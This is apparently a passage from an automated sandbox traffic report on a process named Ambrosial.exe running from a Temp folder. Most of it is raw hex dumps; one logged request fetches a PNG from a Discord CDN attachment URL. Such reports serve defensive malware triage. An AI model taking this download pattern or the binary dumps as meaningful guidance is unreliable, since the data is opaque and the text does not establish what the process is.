                                                                                                                                                                                      2021-10-30 11:52:08 UTC157INData Raw: 02 3b 68 dc f0 b9 a1 71 f3 65 01 40 b8 21 3b e4 73 93 c7 01 d2 5f 1a b1 33 c4 ae 0d 3f 10 c0 11 51 19 16 56 9c 30 ec 09 81 c5 85 45 45 8b 16 7a 1e 39 f1 fd 20 47 0b 02 fd 66 11 d1 8d 3d c2 63 23 bd 60 f5 72 97 bb dc f2 a8 89 1d 2d 5e c4 1a 77 d0 04 75 b3 e8 70 7d 69 11 13 57 bd ea 55 97 3f e3 c6 b1 64 91 a7 ad 0e 7d e2 51 1b 7f f6 2d e8 13 75 91 17 db c9 62 89 a3 8a 03 88 e3 c0 ee 22 0b 32 4e 06 6d c5 61 e2 bb 79 19 de ce 78 2f 70 94 ef 76 b4 03 a7 26 3a 7e 15 f4 81 63 01 65 19 17 2d de b3 68 51 e7 fc 8d b4 9b e3 d1 4e 3f 0f c0 4e 17 3b b1 ec c2 f2 48 99 2f d5 f3 c1 80 f9 d4 82 e3 f2 48 14 27 99 5d 62 3e 74 68 67 c9 c9 ce 25 65 19 f7 91 76 4b d4 4f 84 3a 69 9f 8f 1d 63 f1 33 3f f3 33 cb 63 7f 1c 28 cd 17 60 7e 53 86 5f 3a f3 ee 40 9c 60 87 b6 68 1e 48 b8
                                                                                                                                                                                      Data Ascii: ;hqe@!;s_3?QV0EEz9 Gf=c#`r-^wup}iWU?d}Q-ub"2Nmayx/pv&:~ce-hQN?N;H/H']b>thg%evKO:ic3?3c(`~S_:@`hH
                                                                                                                                                                                      2021-10-30 11:52:08 UTC158INData Raw: 1c 03 61 dc 10 39 84 ee a8 21 72 e4 d4 56 8e 85 c8 31 c3 49 d3 0e 1e c7 e6 98 38 88 d8 b8 b3 c6 58 f9 1c ad 04 5a e9 4a 7a 75 7b 3d 8a 67 21 cc ea 60 24 0e a3 79 10 d3 62 17 bd e2 84 1e f7 30 c2 7c 51 28 89 e9 4a 27 a9 f2 a2 de d3 e2 1c e7 39 cf 79 4e b4 cc 8d b2 b0 22 eb 5c af 2e 42 c5 23 1a c0 96 c8 2e a3 d2 3b 3d 9b 56 fe ec 71 5d af 38 61 8c 7b da 43 27 d3 55 1c 96 ed 0c b1 5e a5 3d 8c ba e3 08 73 b5 d5 3e 76 a7 f8 c5 20 df 37 e2 8b db 3c ea e1 57 8d b1 0c 37 fa 9e 93 06 ca 8f 79 71 bc 94 5f 5d 4b c0 22 e1 8b 28 df d3 63 47 0d 47 8d 78 dc 89 61 61 79 f6 b3 9f bd fc 32 56 b0 a0 e1 88 66 b4 c6 c5 db 95 b5 d1 fb e0 a0 93 5e f1 a8 73 3c ed ed 21 ee e2 ba 48 75 8c 58 ce cb 2a ee c7 f7 f2 12 4f 0b af cf 25 82 2e 9e 43 76 71 f9 b1 41 e5 6c 0b 9c 05 1e 71 fb
                                                                                                                                                                                      Data Ascii: a9!rV1I8XZJzu{=g!`$yb0|Q(J'9yN"\.B#.;=Vq]8a{C'U^=s>v 7<W7yq_]K"(cGGxaay2Vf^s<!HuX*O%.CvqAlq
                                                                                                                                                                                      2021-10-30 11:52:08 UTC159INData Raw: bd c4 25 9c 0b 09 fd 71 d1 79 52 9f 38 36 f5 cb 81 42 48 23 de 2e b5 2d 13 50 1c 3b 77 d2 54 37 4e 5a dc 55 73 47 4d d7 bc 3b 6a 72 d2 b4 b3 26 47 4d 7d a3 9c 50 3b 20 c6 77 11 e1 e9 2a 04 8f 8b 2c bf 2a 53 c5 61 34 4f ec a2 13 2d 7b cf 8b 76 55 9d 7e ce 66 68 95 9b a9 13 db e5 2e 3d 53 88 ce b8 48 97 e1 f5 56 c7 18 3d b6 1f a3 8a 67 f4 f2 a1 65 43 5e 95 df d2 b7 ea cc 60 1c b2 f1 8a e3 33 3a 5e 70 58 b6 b3 f8 58 cc 8e cb 2e 54 63 17 c3 08 7a cf 53 5a a2 1b ae 87 12 16 16 bf 31 23 6e 1b e3 4a 47 9d 8b 13 d3 e0 b6 b1 1e f0 31 67 61 e1 0b d2 5a e4 b1 77 b0 fd ab bf fa ab 6d ea 00 af ab 85 6c a2 ad ca cf 4a 24 d3 8d 50 d5 07 23 79 59 be e7 45 11 3e ee ae 6f 81 1d e5 24 80 23 e1 f0 c3 15 1c 35 be 07 86 33 10 cf 21 e0 4c f0 8f 1c 88 d0 dc 18 c1 db 2e d4 36 39
                                                                                                                                                                                      Data Ascii: %qyR86BH#.-P;wT7NZUsGM;jr&GM}P; w*,*Sa4O-{vU~fh.=SHV=geC^`3:^pXX.TczSZ1#nJG1gaZwmlJ$P#yYE>o$#53!L.69
                                                                                                                                                                                      2021-10-30 11:52:08 UTC161INData Raw: 4b 9c aa 53 ad 86 8c 34 32 ab b7 6a c3 0c 23 e5 b3 fc aa 5c 4f 9f e5 b5 60 6c 66 44 64 ba 48 cf 66 a4 fc 3e d1 d8 cc 8e d1 08 b1 ad ad 74 2b 4f 37 50 49 4c 47 21 df 71 fb 8c 4a 0f 5e 67 cb 6e 14 16 12 87 3f 60 6f c1 79 71 47 6d 1f 6d 38 3b 32 3b 7f b1 cf ca 44 bd d2 08 e7 0e c7 41 f0 23 10 fe 88 7d e4 b1 e7 af fe ea af 6e 53 07 e8 3c fa b1 1c cd 3b 89 74 11 74 cc 4d 9f f3 bc a7 8d bf b3 c2 89 c1 11 e1 df 03 d8 61 7b f0 83 1f bc 3c 0a 75 70 7e e8 93 da a1 be 4a 47 18 85 fe c8 21 93 73 a6 5d 34 e9 35 56 12 d5 5b a1 7c d9 28 ae e3 e9 58 ee a8 f9 ae 1a 42 3e b6 94 63 5c 38 1f ec 9c 71 6e e4 a4 c5 5d 35 3d 02 8d 3b ea 11 b5 c7 db 15 75 2e 5e 46 71 0f 21 8b 8f ea a0 8a c3 68 1e c4 b4 d8 87 be 3a 96 87 99 6e 84 ec 3c cd 52 d5 d1 ab fb 14 47 4d 1d 19 6d 7c 8b 35
                                                                                                                                                                                      Data Ascii: KS42j#\O`lfDdHf>t+O7PILG!qJ^gn?`oyqGmm8;2;DA#}nS<;ttMa{<up~JG!s]45V[|(XB>c\8qn]5=;u.^Fq!h:n<RGMm|5
                                                                                                                                                                                      2021-10-30 11:52:08 UTC162INData Raw: 0d 0e e6 0f fc c0 0f 2c 69 a1 be 0b e2 2e 1a 07 42 d9 2a ee 22 fb 8a 5e 9e 8b 20 4e dd 1c df 9d 35 ed aa 71 1e 5d d0 c9 21 a7 2c 63 e3 bb 6a d1 59 43 c8 d3 f7 d5 b0 8f e7 ca db 95 89 6c 5a 21 b4 74 4e 2b 7f 34 2f 23 cb af ca ec aa f7 b4 e2 99 4e c4 74 c6 e8 7d bd 65 57 e5 8d d6 7d 62 47 6d 0d f1 20 bd 74 8b d8 8e ac 4d d2 c5 10 88 8f a4 5d 32 7d d4 cd a6 47 24 c2 38 45 d1 45 1b e3 88 50 3c d3 89 98 3e 6a b2 fe ee 8b 99 7e b7 6c 9d 56 5e 46 cf 5e f9 fb 3c e6 28 71 be b1 28 48 b4 38 44 58 88 9c 5e bb 47 fa 77 26 51 cd 57 16 6d 16 62 c6 07 c7 0b 21 8e 7e 06 16 72 ed c0 b1 b8 cb 69 c3 11 d0 ae 8c 9c 13 c1 f7 0a 77 fd b5 67 85 9f 3f 97 16 3e 46 ec 08 21 02 a7 85 f7 b7 b1 b3 47 3f 05 73 ee b6 b7 bd ed e2 a0 08 fa 58 8d b7 e6 2e a2 f1 90 bd c2 4c 54 56 78 dc 71
                                                                                                                                                                                      Data Ascii: ,i.B*"^ N5q]!,cjYClZ!tN+4/#Nt}eW}bGm tM]2}G$8EEP<>j~lV^F^<(q(H8DX^Gw&QWmb!~riwg?>F!G?sX.LTVxq
                                                                                                                                                                                      2021-10-30 11:52:08 UTC163INData Raw: da 23 67 87 5d 38 f2 25 a4 e5 b0 65 54 e7 b4 75 af a9 f2 d4 7f 8d 0f ed 41 f4 28 53 3f cc e1 03 10 f3 00 e1 6f b4 78 44 8d a8 cd cc 27 c6 48 3f 2a e1 9a fc a7 7f fa a7 e5 35 26 08 71 74 fa c1 09 1f 0e 10 c6 4b 0e 5c 74 da 20 86 d0 d2 41 2f 1f 46 f3 20 a6 61 54 07 a3 fa 59 bb 2c 8c ba 88 e6 5f 15 cf d2 6b f5 48 cc f3 b4 e2 a2 bc ab b8 91 93 e9 b3 41 51 58 49 9c 7c 4a 47 7d 14 d5 1b 43 97 a8 13 ae ab f4 4e 4b 1f a9 ec 5c a7 b4 44 fd ec f5 f7 ec c4 ae 7d aa e6 65 24 da 8d 96 3b bb e1 fd e6 a6 7f d8 9c 29 e3 5c cd 43 ae 45 39 54 d1 49 bb dc e5 2e b7 b9 ff fd ef bf b9 d2 95 ae b4 38 4e c8 85 2f 7c e1 13 bb 68 38 c2 38 21 95 60 83 2d bb 6d 38 55 38 32 df fc cd df bc b9 e7 3d ef b9 ec 64 3e e1 09 4f d8 5c ed 6a 57 5b 1c 01 60 2c 79 9c 8a 03 d0 7b ec f9 d8 c7 3e
                                                                                                                                                                                      Data Ascii: #g]8%eTuA(S?oxD'H?*5&qtK\t A/F aTY,_kHAQXI|JG}CNK\D}e$;)\CE9TI.8N/|h88!`-m8U82=d>O\jW[`,y{>
                                                                                                                                                                                      2021-10-30 11:52:08 UTC165INData Raw: 59 f3 5d 35 ec 01 e7 8b f1 91 b3 a6 73 2c 41 97 39 6b 8c 85 4b 85 fa e2 7d aa e2 30 9a 07 31 0d a3 3a 98 d1 cf d4 5b 81 7d 2c 33 5b 07 64 e3 5d 9d 83 d6 b9 69 e5 89 ca 66 b9 db 90 e9 e2 64 05 35 00 2e 95 5e a2 c9 ed 69 0f 47 c4 8f 21 aa 38 c4 b4 d3 ca 13 23 36 b3 c4 f6 22 1a 1b 17 d7 cb 4e 65 22 99 6e 96 58 c7 4c 9d 3d db 7d b4 cf c9 e6 64 a4 67 53 e5 8f d4 7d 26 21 87 42 bc e3 1d ef 58 7e a1 c7 02 32 ea ac 9d 9d d1 dc e4 3a 63 41 75 78 7c 89 83 c6 eb 4c d8 d5 62 11 75 27 84 32 38 69 3c 16 7d e7 3b df b9 d5 ae 83 73 f1 47 7f f4 47 9b bb df fd ee cb ee 1d ce 1a ba cc d9 76 de f2 96 b7 a4 f9 b4 0d 27 c2 ef 21 a3 60 3b 6b ef e0 5c 64 60 87 53 e3 c4 b6 93 96 38 59 1f 67 a8 fa 33 d3 4f c0 9e f1 94 93 c6 9c 89 8e 9a 8b 1c 35 5d 6b 9c 4f ed aa b1 83 26 67 4d 3b
                                                                                                                                                                                      Data Ascii: Y]5s,A9kK}01:[},3[d]ifd5.^iG!8#6"Ne"nXL=}dgS}&!BX~2:cAux|Lbu'28i<};sGGv'!`;k\d`S8Yg3O5]kO&gM;
                                                                                                                                                                                      2021-10-30 11:52:08 UTC166INData Raw: 60 9b 3a 40 73 ee 4c 82 f6 7a 9b 3d ed a1 e2 f4 d1 61 47 48 8f 9e 32 67 03 07 e7 99 cf 7c e6 56 73 00 63 37 3a 97 64 4b 5d 7e 0e 38 4f fa 2f 50 9c 44 16 6a 3f 36 50 86 73 f8 13 3f f1 13 9b 77 bd eb 5d cb 8f 0f 78 ff da 4f fd d4 4f 6d fe fe ef ff 7e b1 e1 7b 86 5f f9 95 5f b9 fc 19 fc a8 c3 e6 bb 3d 12 1f 23 8f 0b 6c e2 1c e2 d1 39 8f 8b 71 36 7d 27 92 b2 ff fc cf ff bc 79 fd eb 5f bf a4 21 3a 69 8e c6 28 8a 93 b5 49 ec 4b 2f 74 2c d9 29 ae b1 92 c3 9b 39 6b 12 77 d6 28 43 7f 38 e7 38 62 9c 6b ed aa f5 9c 35 1f 37 e1 ed ca 70 7d b4 e9 a5 61 54 07 33 fa 99 7a 45 2b 3f e6 29 4d d8 ab 17 e2 b8 46 aa fc 56 b9 d1 32 9e 8e 79 27 df 05 3e 43 eb 80 4e d6 e9 11 5d 2f 3d c2 9a 32 a7 8b d1 f1 04 fa e5 e2 37 4b 8f 47 11 1e 77 2a fd 28 bb 96 df 95 d6 04 ce 88 36 55 99
                                                                                                                                                                                      Data Ascii: `:@sLz=aGH2g|Vsc7:dK]~8O/PDj?6Ps?w]xOOm~{__=#l9q6}'y_!:i(IK/t,)9kw(C88bk57p}aT3zE+?)MFV2y'>CN]/=27KGw*(6U
                                                                                                                                                                                      2021-10-30 11:52:08 UTC167INData Raw: 9b d0 e3 0a 5b d2 82 36 b0 20 22 2c 9c be 18 52 96 45 d8 df 9d d6 6b 77 cc a3 8e e8 e8 b0 93 c6 e3 ca de 6e 1a bf f0 f4 dd 34 ea d6 82 cd f9 8d ed 75 d8 cd ba d9 cd 6e b6 b9 e2 15 af b8 fc b8 80 f3 ee 0e 1b ff 53 8a c3 76 bf fb dd 6f 73 fe f3 9f 7f 5b 6a 0c fe df f4 76 b7 bb dd f2 7d 38 fe c5 41 7d a0 7d b4 9b 7a cf 3a eb ac ad f5 67 db 1d c7 86 b4 44 f9 ea 5f b4 8d f4 ce 6b a4 65 9f e5 55 3a 17 fa ca fc 88 bb 6a da 59 93 b3 46 1a 07 0e 3b ec 29 4b 1f 5b 8e 1a 42 5e b5 ab a6 f1 a1 2e 0f 23 51 df 4b 8b 7d e8 47 75 19 3d 3b f2 25 62 b4 ee 8c 38 df 7a f3 2f d2 b2 9f a9 4b b6 ab 1d b5 d9 86 9f 9d a0 ef a3 fd cf ec 46 ca fa c4 9b 91 8a 56 5e 45 af 4c 95 3f 7a 2c 8d 43 36 9e 33 e3 b6 4b d9 cf 05 b4 08 38 3c be ab be a7 c6 a3 2b be 50 2f c8 1f 9d 0b 84 23 e7 9f
                                                                                                                                                                                      Data Ascii: [6 ",REkwn4unSvos[jv}8A}}z:gD_keU:jYF;)K[B^.#QK}Gu=;%b8z/KFV^EL?z,C63K8<+P/#
                                                                                                                                                                                      2021-10-30 11:52:08 UTC169INData Raw: b3 7a 18 29 93 c5 09 63 59 cf 13 6a b7 fa ee 7d 74 91 2d e7 9d f2 72 c8 18 53 89 1c 35 e2 cc 59 39 6a 94 19 a1 6a af 93 e9 44 95 37 5a 4f ab ee 35 b4 8e e1 79 9a 37 a0 f3 a1 b8 c2 a8 cf f2 66 74 51 2a 9b 4c ef 3a a8 3f 22 ef 09 1d e8 ec c6 ae fd da c7 b8 30 11 a3 b8 de e3 2e 91 4c d7 63 4d 99 5e 9f 3d 5f f1 18 42 ac 27 a6 45 a5 af 98 b5 3f d3 60 91 f0 1d 22 e0 dd 56 7c 41 9d 5f 14 b2 08 68 8e bc e7 3d ef d9 5a cc 41 59 c6 71 cd 58 ea d8 b3 e2 65 d7 c0 b8 38 ef 78 c7 3b ca ef ef 31 7e 7c 1f cb d1 c2 5a 41 9e 16 54 81 03 f8 5d df f5 5d 27 1e 17 c6 ef a6 51 27 c7 bf f1 8d 6f bc 3c a6 14 1a db 91 f1 75 3b 42 da af 5d 2a 8e ef c7 73 38 36 bb a9 38 5b 38 f1 b7 bd ed 6d 17 e7 94 dd 31 ca 6a a7 8d 10 07 8d ba d9 41 7b e8 43 1f ba ec b0 dd e3 1e f7 38 c5 29 95 c3
                                                                                                                                                                                      Data Ascii: z)cYj}t-rS5Y9jjD7ZO5y7ftQ*L:?"0.LcM^=_B'E?`"V|A_h=ZAYqXe8x;1~|ZAT]]'Q'o<u;B]*s868[8m1jA{C8)
                                                                                                                                                                                      2021-10-30 11:52:08 UTC170INData Raw: 97 64 6d 90 ad 42 ec e8 4b 65 2b 51 be ea a6 8c 44 73 4e c7 f4 72 4e 6b 1e 54 79 33 fa a8 53 9a 30 c6 3d ed a8 cd 1e 46 c9 60 1e 50 17 73 90 b8 76 e4 78 bc 89 28 2e 07 50 0e 21 65 88 7b 9b 20 b6 cb a9 f2 5a 65 32 32 fb d9 3a c4 48 39 6c 5c 7a 68 ac 3d 1c 8d cf ea 24 55 5e d4 2b ad 30 ea e0 24 47 cd 33 46 59 53 06 8e fb b1 1c 2f af 38 61 56 ef cc b1 46 6c 67 ea 13 5e 46 f1 4c 77 9c 68 b5 79 a4 ed 95 be 02 fb d9 32 19 aa 43 f5 b5 d2 19 95 fe b0 d1 62 e9 8b a3 2f 98 da 51 f1 c5 12 14 97 78 7e 6b 61 05 bf a9 b6 e2 1e 82 c7 77 25 6b 97 c3 82 27 de f7 be f7 2d bf c8 e4 f5 19 ec 7a 31 46 40 1d c4 2f 73 99 cb 2c ef a2 e3 cd fb be 0b 99 c1 23 4e 5e c5 c1 77 d2 a8 93 d7 5d b0 9b c6 38 d3 3f 16 5e 1e b7 f2 e3 01 ef af 8e 55 8d a9 50 9e ec 3c 2d 3c 0e 6e cb 31 a3 ad
                                                                                                                                                                                      Data Ascii: dmBKe+QDsNrNkTy3S0=F`Psvx(.P!e{ Ze22:H9l\zh=$U^+0$G3FYS/8aVFlg^FLwhy2Cb/Qx~kaw%k'-z1F@/s,#N^w]8?^UP<-<n1
                                                                                                                                                                                      2021-10-30 11:52:08 UTC171INData Raw: 6a 5f 6c 5b 4c 8f b0 a6 cc 08 de 5e 49 95 ce a8 f4 47 81 b7 4f b0 50 3a 6e a3 b8 eb 1c dd 54 84 e2 ae 8f a1 88 e9 b5 64 ed ca 68 d9 79 1f bd ed c0 3b c3 f8 ef 4d fe 6a 89 7f 74 60 27 0d c7 4c 36 94 c1 11 61 d7 4c 3f c8 20 8f 5f 87 f2 4a 8f 5b df fa d6 9b 17 bf f8 c5 cb a3 d2 88 1c 97 ac 6d ae 53 db a4 8b 71 e1 f1 51 5a 65 74 9c ca c6 f3 dd e1 22 8e a8 7f 8a bb 83 a6 50 a2 fa 3c 9c 21 9b 4f 3d 9d e2 1e c6 fc 68 23 62 7a 16 d5 ed 22 87 0b 47 8c d0 9d 32 09 69 89 3b 69 84 5e 6f 45 95 37 a3 6f d5 3f c3 9a 76 8a 2c bf 9a 47 1e c6 f8 48 7a 8d 5e 3a 41 dc db 4c 3c 8a 73 8e cf 7c 3a fc 8c ee d4 4e 46 dd 6c 1a 4e a7 0d 8c 94 6b e1 03 9c 0d 76 44 f5 67 61 d4 41 66 e7 21 cc d8 38 e8 62 5b b3 3e 54 36 19 d9 71 22 95 8d eb 67 da 55 d9 ce b0 a6 cc 28 de 4e 49 95 ce a8
                                                                                                                                                                                      Data Ascii: j_l[L^IGOP:nTdhy;Mjt`'L6aL? _J[mSqQZet"P<!O=h#bz"G2i;i^oE7o?v,GHz^:AL<s|:NFlNkvDgaAf!8b[>T6q"gU(NI
                                                                                                                                                                                      2021-10-30 11:52:08 UTC173INData Raw: 3d d6 1e 43 78 f9 2a 0e bb 1e 27 23 3b 5e 0c 61 e6 d8 33 b6 fb c2 db 2c a9 d2 19 95 7e 06 3f 8e c8 74 11 bf 41 f8 0d 63 34 2e 3c 2e 32 1d ec a3 bf 33 8c 1c 6f b6 4d d9 d8 ba 2e 8b ef a2 8b 71 70 fd 61 31 5a 77 d5 2e c4 1d b1 4c 64 87 a8 9c 87 c2 d3 31 6f 84 6c be 7a 18 e3 9e 76 7a 69 51 e9 41 79 59 3f 94 97 95 c7 5e 65 18 3b 20 2d 5b 2d fc ee a4 b9 0e 88 c7 ba 7b 69 c8 74 a7 1b b5 c9 db e6 63 aa b8 87 a3 f1 59 5d d4 0b e2 b1 9d 3a 27 48 3c 2f 88 97 07 d2 27 bf 34 e9 10 88 07 85 4c d7 63 4d 19 c8 3a 9d 21 bd e7 13 97 28 ed 54 fa d3 cd 68 7b 98 14 a2 8a 43 4c ef 8a b7 6f 5f 63 78 dc ce c1 08 fb e8 73 56 47 ab 5e ce 65 94 78 e3 e8 c5 11 af 4b c4 fc 8c 5e fe 99 44 35 f6 d2 2b de 93 e8 b0 64 12 a9 f4 c7 81 d8 6e 4f bb 5e c4 34 c4 79 12 e3 33 73 28 ab c7 c3 18
                                                                                                                                                                                      Data Ascii: =Cx*'#;^a3,~?tAc4.<.23oM.qpa1Zw.Ld1olzvziQAyY?^e; -[-{itcY]:'H</'4LcM:!(Th{CLo_cxsVG^exK^D5+dnO^4y3s(
                                                                                                                                                                                      2021-10-30 11:52:08 UTC174INData Raw: c3 08 ce 9a 3b 69 fe f8 93 3c ec 19 e3 e8 a8 69 57 cd 9d b5 5d ce c9 51 e2 63 71 58 ec 3a 06 de c6 28 7e bf 55 3c 4a 85 da 75 c2 51 5b db d0 ac dc 51 9e f8 d1 63 f5 ec c8 6f 89 6c 4e 17 a7 e3 d8 3e 81 aa 78 8b ac cd bb f6 e3 74 9e 83 c3 82 3e f5 fa a5 0b 3a 93 ec 46 d0 ba 29 48 44 4c 7f ae 73 26 8d c5 71 6e ab e6 b5 cf 6f 8f f7 88 f3 52 e9 4c 27 2a 1b e1 79 31 ee a1 88 69 91 e9 77 d1 55 60 8b e8 7a c6 19 d3 ce 9a 3b 6c 72 d6 10 5d f7 8c 33 4e 59 26 71 57 6d e6 bc 1c 06 1a 13 f5 d7 c5 e9 a5 33 aa 7e f5 fa 3b 3b 1e de 66 89 ce 45 bc 17 57 54 c7 3c d2 1d b5 a3 9a 08 bd 13 43 d8 8a bb 2e e2 b6 91 51 dd 0c b3 e5 77 3d 5e c4 27 55 15 5f 83 da e9 ed dd 77 db 4f 17 b1 1f 59 5f 81 74 af cf 7e 61 2b 9e 5d fc c4 5d 1f 6d 14 66 b2 2b c7 a5 8e 11 8e ea 38 9f ab 68 4e
                                                                                                                                                                                      Data Ascii: ;i<iW]QcqX:(~U<JuQ[QcolN>xt>:F)HDLs&qnoRL'*y1iwU`z;lr]3NY&qWm3~;;fEWT<C.Qw=^'U_wOY_t~a+]]mf+8hN


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      5192.168.2.349752162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:10 UTC175OUTGET /attachments/863628606516625408/866495749909643294/ZephyrBannerIcon-nxstBX5z.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:10 UTC175INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:10 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 142661
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646f977e9a6973-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 2413293
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "708b6ddec8e3fa19c5d4ce27df0cba9b"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:10 GMT
                                                                                                                                                                                      Last-Modified: Mon, 19 Jul 2021 01:44:45 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1626659085529098
                                                                                                                                                                                      x-goog-hash: crc32c=4sXKnw==
                                                                                                                                                                                      x-goog-hash: md5=cItt3sjj+hnF1M4n3wy6mw==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 142661
                                                                                                                                                                                      X-GUploader-UploadID: ADPycduvx3OPAHnWS3KtfDk1TOd1iGeG--qNvq_xYaHFnVFc3h3BbSt7MvpZU89GktpQToUgNcuVjiXVA6Boib08Mjc
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mH%2FVIkRtU%2Bz2I5DjZzzmmz5HjtsnaP0NuQojKQZbv%2B%2F6QnjDbQycgT8xO5zePcyp8Jq3K9c14ppbs0ylMvjVxuDJzotcUJ8TlJDVyrLFn6a0ufOCqkcX25kYIv8e563cOO7mxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:10 UTC176INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:10 UTC176INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e a4 bd 79 d0 e7 49 56 d6 9b 55 6f bd fb 52 7b 55 4f 2f d3 3d dd b3 34 b3 0f b2 ca 28 72 c1 2b 02 4a 5c e3 02 81 0a 84 8a 06 b8 04 18 2a 61 84 a1 94 57 c2 40 51 d1 50 f8 43 ae 28 db 28 5c 64 1d 2e c2 05 14 64 19 66 86 d9 f7 81 d9 7b ba bb ba 96 77 5f 6b b9 cf e7 39 f9 fc 7e 59 ef 34 d8 a3 e7 f7 e6 9b db c9 93 27 4f 9e cc 3c 99 df ed c4 d7 bd f6 4f dd 3d 71 e2 44 3b 3a 3a 6a f8 77 ef de 9d f8 27 e5 cf cc cc 34 c0 f1 93 27 e5 13 3b d9 4e 9c 2c 1c ca 01 b7 ef de 69 77 e4 df ba 75 ab 1d
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^yIVUoR{UO/=4(r+J\*aW@QPC((\d.df{w_k9~Y4'O<O=qD;::jw'4';N,iwu
                                                                                                                                                                                      2021-10-30 11:52:10 UTC178INData Raw: 19 bf 78 33 6d 85 03 e1 13 a5 3e c5 c4 4c 58 fe c3 97 ef 6f 8f dd ff 50 3b fd bc 4b ed ff 7e dd 0f b7 ab 3b db 5e c4 f6 34 80 99 00 11 e0 44 10 9d 1e 66 da ac 06 3b 7c 32 51 41 f3 38 80 7f fb ee 6d b7 d7 93 89 e2 4c f0 b4 97 08 13 c7 9e 8c 4f dc 81 06 fa 11 83 45 4b 09 93 10 b2 2e b9 49 2e 42 a6 f9 91 87 1a 65 7a 96 ad 66 3a 64 70 4a 8b 36 6d 99 17 4f e5 6b d1 93 bf 2c 43 63 09 63 4b 8b 22 fc 2e 29 be a8 49 79 41 f8 6b 5a 84 56 e5 48 c3 30 63 41 26 ef 94 da 84 31 77 52 75 cf aa ae 25 e1 cc 6b f1 a1 8d 18 2e 6a b4 c2 b3 ae 9b 46 22 f7 db 92 97 db 26 7c 0c 44 06 3d 6d c4 50 87 4f f2 e8 39 87 35 89 59 f6 5a 0c 30 20 58 a0 09 d3 3a 7c ca 80 9f f2 38 70 ee 22 c0 80 d2 30 ac f0 11 0e bc 95 ee 54 1c 17 c5 8f 1e 90 0f 9f f8 b7 8e 6e b5 bd dd dd b6 b3 b7 67 a3 88
                                                                                                                                                                                      Data Ascii: x3m>LXoP;K~;^4Df;|2QA8mLOEK.I.Bezf:dpJ6mOk,CccK".)IyAkZVH0cA&1wRu%k.jF"&|D=mPO95YZ0 X:|8p"0Tng
                                                                                                                                                                                      2021-10-30 11:52:10 UTC179INData Raw: 6b 6d 5e fc a0 86 33 18 f0 a2 bf a0 8d 00 7c d3 8f 18 8b e3 7c 40 1b 58 4c c9 a7 5f 31 d2 6c 58 8b df 59 19 1f 9c 56 66 4e 61 61 f2 69 83 ca 52 9e 76 a2 27 75 52 d7 81 82 72 b7 c4 1f 6d ce 89 1d 9d 06 ff 9c 7c 1e c8 40 c2 50 5b df e0 84 6a 47 9b 2e 8d 67 e1 23 1b ca b0 f9 70 47 ab 0e 9f 86 88 67 8c 25 8c 65 7e 77 34 3e e9 7f 0c 31 0c 46 0a 31 fe 90 0d a7 a5 e4 13 c6 40 62 5c 70 32 3d a7 36 21 6b 18 a1 0d cc 1f f4 ef 9e f8 d9 94 31 0c 0f 5b 32 92 b7 76 f7 2c 53 ce 4a 39 49 43 2f 60 65 53 3c 6f 6a f3 60 43 99 76 28 1f ad c5 40 f3 69 bd d2 eb f4 0e 99 30 fb 95 ee c3 57 8d 37 7c 84 80 80 f0 ca c0 00 bc 91 55 3e f3 05 27 fa 18 62 73 fd 74 9f 79 01 c3 0d 09 23 1b e4 4e 3e 7e cd e1 a4 96 3e 52 17 34 2c 73 78 54 1a 78 47 6a 07 3e fd 18 f0 95 0d e1 db 20 93 2b fe
                                                                                                                                                                                      Data Ascii: km^3||@XL_1lXYVfNaaiRv'uRrm|@P[jG.g#pGg%e~w4>1F1@b\p2=6!k1[2v,SJ9IC/`eS<oj`Cv(@i0W7|U>'bsty#N>~>R4,sxTxGj> +
